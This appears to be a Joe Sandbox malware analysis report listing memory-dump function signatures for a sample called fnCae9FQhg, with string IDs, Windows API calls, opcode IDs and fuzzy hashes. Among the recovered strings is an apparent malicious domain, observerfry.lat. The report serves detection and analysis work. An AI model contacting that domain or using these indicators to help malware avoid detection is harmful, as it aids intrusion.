                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 2h?n$7$SP$^`/4$gfff
                                                                                                                                                                • API String ID: 0-3257051659
                                                                                                                                                                • Opcode ID: b87f36ce4e76bd7bb2d0b89041b413ecf717f3da537d65804fa76794c260b61f
                                                                                                                                                                • Instruction ID: f572e97e4ba1916ac077c836d2cb299bcffdb7442fc943c851a3cc37431bf1cf
                                                                                                                                                                • Opcode Fuzzy Hash: b87f36ce4e76bd7bb2d0b89041b413ecf717f3da537d65804fa76794c260b61f
                                                                                                                                                                • Instruction Fuzzy Hash: 60A13872A543514BD314CF28D85176FB7E6FBC5318F19CA3EE489D7392DA3888068782
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 9deZ$eb$sp${s
                                                                                                                                                                • API String ID: 0-3993331145
                                                                                                                                                                • Opcode ID: 670f5e233cbafa9d2f53939898861f34ce756db01ce690302e068ee52fb64590
                                                                                                                                                                • Instruction ID: 731027a774de26a790416875d5f9424317dddd9201a710093b0aa4d65ad9864c
                                                                                                                                                                • Opcode Fuzzy Hash: 670f5e233cbafa9d2f53939898861f34ce756db01ce690302e068ee52fb64590
                                                                                                                                                                • Instruction Fuzzy Hash: 54D116B16183448BC728DF25C89166BB7F2FFD5754F08DA1CE4968B3A0E7789904CB92
                                                                                                                                                                APIs
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 009E91DA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID: +Ku$wpq
                                                                                                                                                                • API String ID: 237503144-1953850642
                                                                                                                                                                • Opcode ID: 59a6b6eea54ec5da6d96b90edac5dc6b244619f6bdd0f2fc62f80ae2bb6080d3
                                                                                                                                                                • Instruction ID: c0cb8549ce332c5d00bedb11a4c405852807b28b5e2786b48d0f0a8e145123c0
                                                                                                                                                                • Opcode Fuzzy Hash: 59a6b6eea54ec5da6d96b90edac5dc6b244619f6bdd0f2fc62f80ae2bb6080d3
                                                                                                                                                                • Instruction Fuzzy Hash: CA51CF7260C3558FC324CF69984076FB7F6EBC5310F15892DE5A6CB285DB30D90A8B92
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: \$]$^$_
                                                                                                                                                                • API String ID: 0-1726580471
                                                                                                                                                                • Opcode ID: e1e5b6e034a661bd122afddaef1646c3b0c4a199fd75de6e1f086a2cef9d26e5
                                                                                                                                                                • Instruction ID: c8b193e7eb65959e5e3ef950e3de565bf511f6f969d574d7500642ab1d7b0b8f
                                                                                                                                                                • Opcode Fuzzy Hash: e1e5b6e034a661bd122afddaef1646c3b0c4a199fd75de6e1f086a2cef9d26e5
                                                                                                                                                                • Instruction Fuzzy Hash: 7E228C215087D5CED326CB3C8848B597F911B67324F0E82D9C5E95F3F3C6A9894AC762
                                                                                                                                                                APIs
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 009E9170
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID: M/($M/(
                                                                                                                                                                • API String ID: 237503144-1710806632
                                                                                                                                                                • Opcode ID: 4403808be1a0f34021f6e9ee19b223ba39704158c4beab477d80e3d4f33c390b
                                                                                                                                                                • Instruction ID: 08551002ea9811b173dcc4ce823fd0588b9ff8c5378f442875c322d3334af009
                                                                                                                                                                • Opcode Fuzzy Hash: 4403808be1a0f34021f6e9ee19b223ba39704158c4beab477d80e3d4f33c390b
                                                                                                                                                                • Instruction Fuzzy Hash: 66212371A5C3515FE714CE349881B9FB7AAEBC2700F01892CE0D1DB1C5D675880B8752
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: EXCm$EXCm$_^]\$_^]\
                                                                                                                                                                • API String ID: 0-1657758763
                                                                                                                                                                • Opcode ID: 8ecaaa5f6b4ad98d047935d04753648ae9461210ff56afa809b6f32b17d20586
                                                                                                                                                                • Instruction ID: 8d001338ff3f2b987069fe0b749bf675310530ef876d05b4513cfc306bcedc5c
                                                                                                                                                                • Opcode Fuzzy Hash: 8ecaaa5f6b4ad98d047935d04753648ae9461210ff56afa809b6f32b17d20586
                                                                                                                                                                • Instruction Fuzzy Hash: CC5183A02046928BD726CB3A84A0B77BBE1AF57310F1D85ACC4E78B652D625AD47CB50
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: VN$VN$i$i
                                                                                                                                                                • API String ID: 0-1885346908
                                                                                                                                                                • Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                • Instruction ID: f6e14664cd4edfe0e62e74d5c84408fe62b1dfa17b0bfaaeca07bfd234948a07
                                                                                                                                                                • Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                • Instruction Fuzzy Hash: E921DB2114C3C14AD3068E76804126AFBE7ABD6728F29465DE0F15F3A1EA3BDD094757
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: _^]\$_^]\$_^]\
                                                                                                                                                                • API String ID: 0-3175222818
                                                                                                                                                                • Opcode ID: 7a911e449e5b7fd298228f596ed40c1ac1e1ae57e7c86b20f9b00372b748ecac
                                                                                                                                                                • Instruction ID: 51a0eb73b5695540bbaece9696a0a93f15d1e7b10b65e5457b8821116cc01a4d
                                                                                                                                                                • Opcode Fuzzy Hash: 7a911e449e5b7fd298228f596ed40c1ac1e1ae57e7c86b20f9b00372b748ecac
                                                                                                                                                                • Instruction Fuzzy Hash: 84D158B6B083184BD314CE65CC8073BB796ABC5714F1A8A2CE6E957391D771DC46CB82
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 1$7CDF789295067FF1BEBA0C6A975F1733$A
                                                                                                                                                                • API String ID: 0-4004053459
                                                                                                                                                                • Opcode ID: 856a66d80c947e17cc1a1ab60ea931cb75e142e280399261dd40c30e74b2d5f0
                                                                                                                                                                • Instruction ID: a27e4efd2420cb8de8fdc13bfecd0a0fb27f661996202d4eb84d7831a6d58487
                                                                                                                                                                • Opcode Fuzzy Hash: 856a66d80c947e17cc1a1ab60ea931cb75e142e280399261dd40c30e74b2d5f0
                                                                                                                                                                • Instruction Fuzzy Hash: 9CD106759083508BD718CF24C855BABBBE5FFC5318F08896DE4D9CB242DB389906CB96
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: .txt$<\hX$_^]\
                                                                                                                                                                • API String ID: 0-3117400391
                                                                                                                                                                • Opcode ID: f4f40d30ae6c95aa9b74ddcbc05bcaf74aa480391d7de45fe3c502bddefe0d81
                                                                                                                                                                • Instruction ID: 71b3adfd8e05cf54263f7d13b74bf50e7028bd718e16a7732f39785b2073733a
                                                                                                                                                                • Opcode Fuzzy Hash: f4f40d30ae6c95aa9b74ddcbc05bcaf74aa480391d7de45fe3c502bddefe0d81
                                                                                                                                                                • Instruction Fuzzy Hash: B6C1127190C385DFE705DF29D89162EBBE2AF85310F088A6CF095472A2D735AD46CB13
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Fm$V]$observerfry.lat
                                                                                                                                                                • API String ID: 0-2988015416
                                                                                                                                                                • Opcode ID: ab5f7b8dbaa83407188d06a8cd7640ca22d368193b23c41e8607a8784e639c9c
                                                                                                                                                                • Instruction ID: 6184330440bbbc7887cbf8c0d7ecff5f88887688bc973b0721e1064e58a887eb
                                                                                                                                                                • Opcode Fuzzy Hash: ab5f7b8dbaa83407188d06a8cd7640ca22d368193b23c41e8607a8784e639c9c
                                                                                                                                                                • Instruction Fuzzy Hash: AC91E2B56557808FD325CF29C480A56BFA2EF9631872D86ACC0D54F766C33AE807CB51
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Fm$V]$observerfry.lat
                                                                                                                                                                • API String ID: 0-2988015416
                                                                                                                                                                • Opcode ID: 945e61be19fc53792e6f5b560c87ae44769cb4169ae84fcd7682b6e62eb12a12
                                                                                                                                                                • Instruction ID: b48d23b98af85449b57cd085833ac6b9398b1723201ba41f443e1874c4ab3ac8
                                                                                                                                                                • Opcode Fuzzy Hash: 945e61be19fc53792e6f5b560c87ae44769cb4169ae84fcd7682b6e62eb12a12
                                                                                                                                                                • Instruction Fuzzy Hash: D08102B65497818FD725CF29C4D0A52BFA2FF96310719859CC8D64F36AC339E806CB91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: D]+\$_^]\
                                                                                                                                                                • API String ID: 0-2976362004
                                                                                                                                                                • Opcode ID: ce767512433a7c63d797f51af8cbd80ef8ece9fbfeae53ac7bcdd1d2e847d32c
                                                                                                                                                                • Instruction ID: c58f349929b9f7b101af0ea85fb6b9ad2d793fa3e3b5b58760c0083214d7a5c3
                                                                                                                                                                • Opcode Fuzzy Hash: ce767512433a7c63d797f51af8cbd80ef8ece9fbfeae53ac7bcdd1d2e847d32c
                                                                                                                                                                • Instruction Fuzzy Hash: BE525170648304DBE704DF28EC52B3BB3E5FB95315F19892DE586873A1E771A812CB92
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: [V$bh
                                                                                                                                                                • API String ID: 0-2174178241
                                                                                                                                                                • Opcode ID: 984f227d2abf6308f7769df423d4f0ee30ef8e177e93fe633797ec5a9029f521
                                                                                                                                                                • Instruction ID: 2d3ee6e9e7bddde5c0f526d7de1defef2b8d66ac7ff6573043ccd160a6bbc895
                                                                                                                                                                • Opcode Fuzzy Hash: 984f227d2abf6308f7769df423d4f0ee30ef8e177e93fe633797ec5a9029f521
                                                                                                                                                                • Instruction Fuzzy Hash: DC3237B1941712CBCB24CF28C8926B7B7B1FFA5310F18C25DD8969B394E734A942CB91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: C@$_^]\
                                                                                                                                                                • API String ID: 0-1259475386
                                                                                                                                                                • Opcode ID: 1ce6b643d9df3a3199e7605be9b0f8c5021f5cb4661ac06cbbdb496f33078d20
                                                                                                                                                                • Instruction ID: d0da69fa66f9d91b6ac39e6ae5a5d007f9abb2af75ed812b11a48d759569c2b9
                                                                                                                                                                • Opcode Fuzzy Hash: 1ce6b643d9df3a3199e7605be9b0f8c5021f5cb4661ac06cbbdb496f33078d20
                                                                                                                                                                • Instruction Fuzzy Hash: 9AB119B1A083449BD715DB26C852B7BB3F9EFD1314F19992CE89697382E238DD018752
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: &$wt
                                                                                                                                                                • API String ID: 0-2890898390
                                                                                                                                                                • Opcode ID: d93b3c4a36496fbbed57b70da7b3f725ffb3c623bf06f43de9d9449e88e93856
                                                                                                                                                                • Instruction ID: 26a19b12d9a498fb79b491eeb55f25fb83ea6b49aa5c1a62cef49745654aa9e2
                                                                                                                                                                • Opcode Fuzzy Hash: d93b3c4a36496fbbed57b70da7b3f725ffb3c623bf06f43de9d9449e88e93856
                                                                                                                                                                • Instruction Fuzzy Hash: CC8159715083408BD725DF28C4617ABBBE1FFDA324F189A1DE4DA9B392E7348905C786
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: )$IEND
                                                                                                                                                                • API String ID: 0-707183367
                                                                                                                                                                • Opcode ID: ce4b9f37cfa020ac09961ce7171b1c410e5a7ebe0ac0983def3883733c08e254
                                                                                                                                                                • Instruction ID: b88560590940450db8c2c6f8927ca1f8947fd1f39849d16e7c8ce257edb1f3a8
                                                                                                                                                                • Opcode Fuzzy Hash: ce4b9f37cfa020ac09961ce7171b1c410e5a7ebe0ac0983def3883733c08e254
                                                                                                                                                                • Instruction Fuzzy Hash: 7ED1A0B1A083449FE720CF14D895B9EBBE4AB94304F14492DF9999B382D775E908CF93
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (. 7$,7
                                                                                                                                                                • API String ID: 0-1315767106
                                                                                                                                                                • Opcode ID: 8240cad1389ae1114b8b6080d177233f48bb8882f964634357495d3078a47629
                                                                                                                                                                • Instruction ID: dec901d21d669d71aa2a5e74512a9ae545c9fd1238de885e601df264c46deb9c
                                                                                                                                                                • Opcode Fuzzy Hash: 8240cad1389ae1114b8b6080d177233f48bb8882f964634357495d3078a47629
                                                                                                                                                                • Instruction Fuzzy Hash: 18A1BEB190C3819FC715DF65C89162BBBE6AFD6310F14892CE4968B2A2E734E845CB52
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000003.2341055931.00000000057D1000.00000004.00000800.00020000.00000000.sdmp, Offset: 057CF000, based on PE: false
                                                                                                                                                                 • Associated: 00000001.00000003.2364559190.00000000057CF000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_3_57d1000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: h
                                                                                                                                                                • API String ID: 0-2439710439
                                                                                                                                                                • Opcode ID: 1c14a9cf315b76a9a871399e41edb68cc39bd29ee6d06657962d846783471257
                                                                                                                                                                • Instruction ID: 2ca517f14e5cb4ef155822d3b042ca38c7802b4109a5588c61f277b52bcbe359
                                                                                                                                                                • Opcode Fuzzy Hash: 1c14a9cf315b76a9a871399e41edb68cc39bd29ee6d06657962d846783471257
                                                                                                                                                                • Instruction Fuzzy Hash: 1A72F09640E7C10FD71787748C7AA61BFB1AE13114B1E86CFC4C98F4E3E659990AE362
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000003.2341055931.00000000057D1000.00000004.00000800.00020000.00000000.sdmp, Offset: 057D1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_3_57d1000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: h
                                                                                                                                                                • API String ID: 0-2439710439
                                                                                                                                                                • Opcode ID: 100e65cc32904bd2cd4e8882d321d88d406c38fd60dc55a6a9597a49e0f97dca
                                                                                                                                                                • Instruction ID: 2ca517f14e5cb4ef155822d3b042ca38c7802b4109a5588c61f277b52bcbe359
                                                                                                                                                                • Opcode Fuzzy Hash: 100e65cc32904bd2cd4e8882d321d88d406c38fd60dc55a6a9597a49e0f97dca
                                                                                                                                                                • Instruction Fuzzy Hash: 1A72F09640E7C10FD71787748C7AA61BFB1AE13114B1E86CFC4C98F4E3E659990AE362
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: EWC`
                                                                                                                                                                • API String ID: 0-1922773688
                                                                                                                                                                • Opcode ID: a7e848a95095d6f8746f067e8ae4ffb949a2094320fe28381b79a542654d0bad
                                                                                                                                                                • Instruction ID: f926c19d12cdc8dcd95c9b9ea1fab81c89c85423808c8952ede6f68464993eed
                                                                                                                                                                • Opcode Fuzzy Hash: a7e848a95095d6f8746f067e8ae4ffb949a2094320fe28381b79a542654d0bad
                                                                                                                                                                • Instruction Fuzzy Hash: 71D10E74505741CBC3358F28C4A17A3BBF2EFA6344B18942ED5C68B791E739E806C750
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(1A11171A), ref: 009ED2A4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3664257935-0
